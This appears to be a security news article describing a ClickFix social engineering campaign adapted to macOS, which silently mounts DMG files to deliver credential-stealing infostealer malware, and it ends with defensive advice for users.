A newly identified attack campaign targeting macOS users has adapted the increasingly prevalent ClickFix social engineering technique to Apple’s desktop operating system, silently mounting disk image files in the background to deliver information-stealing malware without triggering the level of user suspicion that more overt installation methods typically provoke. ClickFix, which originally emerged and proliferated as a Windows-focused attack vector, instructs victims to copy and paste malicious commands into their own systems under the pretence of fixing a technical problem, verifying they are human, or completing a routine software update, exploiting the user’s own actions to bypass security controls that would otherwise block an unsolicited installation. The adaptation of this technique to macOS is a significant development that challenges the widely held but increasingly outdated perception among Apple users that their platform offers inherent protection against the kinds of social engineering attacks that routinely compromise Windows environments, and reflects a broader shift among threat actors towards targeting the growing macOS user base with purpose-built campaigns rather than treating it as an afterthought.
The macOS variant of the attack introduces a technically noteworthy twist by silently mounting a disk image file, a DMG, as part of the infection chain, a method that takes advantage of macOS’s native ability to mount such files automatically and that can occur without producing the visible indicators a cautious user might otherwise notice and question. Disk image files are a familiar and trusted format for macOS users, routinely used for legitimate software distribution by Apple and third-party developers alike, meaning their appearance in an attack chain carries a degree of inherent plausibility that more obviously suspicious file types would lack. By leveraging a trusted and familiar file format in combination with the psychological manipulation central to the ClickFix approach, attackers have constructed an infection pathway that is difficult for victims to identify as malicious in the moment they are most vulnerable to it, which is when they are actively following what they believe to be legitimate instructions to resolve a problem or complete a task.
The payload delivered through this campaign is an infostealer, a category of malware specifically designed to harvest credentials, browser cookies, saved passwords, cryptocurrency wallet data, and other sensitive information from the compromised machine and transmit it silently to attacker-controlled infrastructure. Infostealers have become one of the most commercially significant categories of malware in the current threat landscape, with stolen credential data routinely sold through criminal marketplaces and used to facilitate follow-on intrusions into corporate networks, cloud environments, and financial accounts. macOS users should treat any web page or pop-up that instructs them to open Terminal, run a command, or manually execute any file with extreme scepticism regardless of how legitimate the surrounding context appears, and to ensure their systems are running current macOS security updates and reputable endpoint protection capable of detecting infostealer behaviour.